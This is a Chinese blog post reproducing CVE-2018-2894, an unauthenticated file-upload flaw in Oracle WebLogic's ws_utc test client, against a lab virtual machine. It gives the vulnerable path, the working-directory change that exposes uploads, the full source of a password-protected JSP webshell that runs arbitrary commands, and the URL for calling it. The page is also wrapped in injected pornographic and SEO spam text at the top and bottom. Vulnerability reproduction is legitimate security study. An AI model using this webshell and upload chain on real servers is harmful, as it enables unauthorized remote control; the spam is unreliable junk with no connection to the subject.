<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      Weblogic-CVE-2018-2894

      漏洞背景

        該漏洞存在于 WebLogic 自帶的 ws_utc 模塊(Web Services Test Client)。該模塊原用于測(cè)試 Web Service 接口,但其中的文件上傳接口對(duì)上傳內(nèi)容與訪問(wèn)權(quán)限未做嚴(yán)格限制,導(dǎo)致攻擊者可在無(wú)需認(rèn)證的情況下上傳 JSP 木馬,并通過(guò)公開(kāi)路徑直接訪問(wèn)執(zhí)行,從而遠(yuǎn)程控制服務(wù)器。

      影響版本:Oracle WebLogic Server 10.3.6.0、12.1.3.0

      利用條件

      • ws_utc 模塊處于部署狀態(tài)

      • WebLogic 控制臺(tái)存在文件上傳入口

      • 控制臺(tái)訪問(wèn)路徑未做身份限制(或者可繞過(guò)認(rèn)證)

      漏洞復(fù)現(xiàn)

      通過(guò)虛擬機(jī)搭建靶場(chǎng),訪問(wèn)后網(wǎng)頁(yè)如下:

      image

       漏洞點(diǎn)存在的路徑是: /ws_utc/config.do ,這個(gè)路徑還是未授權(quán)訪問(wèn)路徑。訪問(wèn)頁(yè)面如下:

      image

      然后我們把上圖“Work Home Dir:  當(dāng)前的工作目錄”功能點(diǎn)的路徑切換成: /u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css ,點(diǎn)擊提交(將目錄設(shè)置為ws_utc應(yīng)用的靜態(tài)文件css目錄,目的是后續(xù)無(wú)需權(quán)限即可訪問(wèn)上傳的Webshell)。然后點(diǎn)擊左側(cè)“安全”功能點(diǎn),進(jìn)入頁(yè)面后,點(diǎn)擊“添加”,在文件上傳的功能點(diǎn)上傳jsp木馬文件。如下圖:

      image

       上傳的jsp文件內(nèi)容是:

       1 <%
       2     if ("zyon".equals(request.getParameter("pass"))) {
       3         String cmd = request.getParameter("cmd");
       4         Process p = Runtime.getRuntime().exec(cmd);
       5         java.io.InputStream is = p.getInputStream();
       6         java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");
       7         String output = s.hasNext() ? s.next() : "";
       8         out.println("<pre>" + output + "</pre>");
       9     }
      10 %>

      返回包會(huì)返回一個(gè)時(shí)間戳和上傳的文件名,如下圖:

      image

       上傳完之后“安全”功能點(diǎn)的的頁(yè)面如下圖:

      image

       然后訪問(wèn)路徑如下

      http://192.168.49.151:7001/ws_utc/css/config/keystore/時(shí)間戳_上傳文件名

      然后拼接上命令執(zhí)行“id”,成功回顯,如下圖:

      image

      總結(jié):CVE-2018-2894 是 WebLogic 中 ws_utc 模塊任意文件上傳漏洞,因上傳目錄可被 Web 訪問(wèn),攻擊者可利用它上傳 JSP 木馬并遠(yuǎn)程命令執(zhí)行,是一個(gè)典型的“未授權(quán) + 任意上傳 + RCE”組合型高危漏洞

       

      posted @ 2025-08-03 18:08  ZyonSec  閱讀(51)  評(píng)論(0)    收藏  舉報(bào)
      主站蜘蛛池模板: 五月天久久综合国产一区二区| 亚洲综合色区另类av| 999精品全免费观看视频| 国产精品免费AⅤ片在线观看| 亚洲AV日韩AV综合在线观看| 人妻中文字幕亚洲精品| 国产99视频精品免费视频6| 亚洲一区国色天香| 日韩精品一区二区三区中文无码| 国产精品一区二区中文| 国产99在线 | 欧美| 国内视频偷拍久久伊人网| 国产精品久久久一区二区三区| 天堂a无码a无线孕交| 国产高清自产拍av在线| 最近2019中文字幕大全第二页 | 高清自拍亚洲精品二区| 18禁裸乳无遮挡自慰免费动漫| 久久人人97超碰精品| 久久午夜无码鲁丝片午夜精品 | 久久96热在精品国产高清| 精品久久精品久久精品九九| 制服丝袜国产精品| 亚洲av无码一区二区三区网站| 亚洲综合国产激情另类一区| 99国产精品永久免费视频| 国内揄拍国内精品少妇国语| 欧美xxxx黑人又粗又大| 人妻教师痴汉电车波多野结衣| 巨大黑人极品videos精品| 国产精品中文字幕av| 国产精品毛片一区视频播| 欧美亚洲国产日韩电影在线| 97精品久久久大香线焦| 又黄又刺激又黄又舒服| 国产精品亚洲一区二区在| 怀柔区| 亚洲精品一区二区动漫| 国产精品午夜无码AV天美传媒| 久久99精品久久久学生| 国产在线观看网址不卡一区|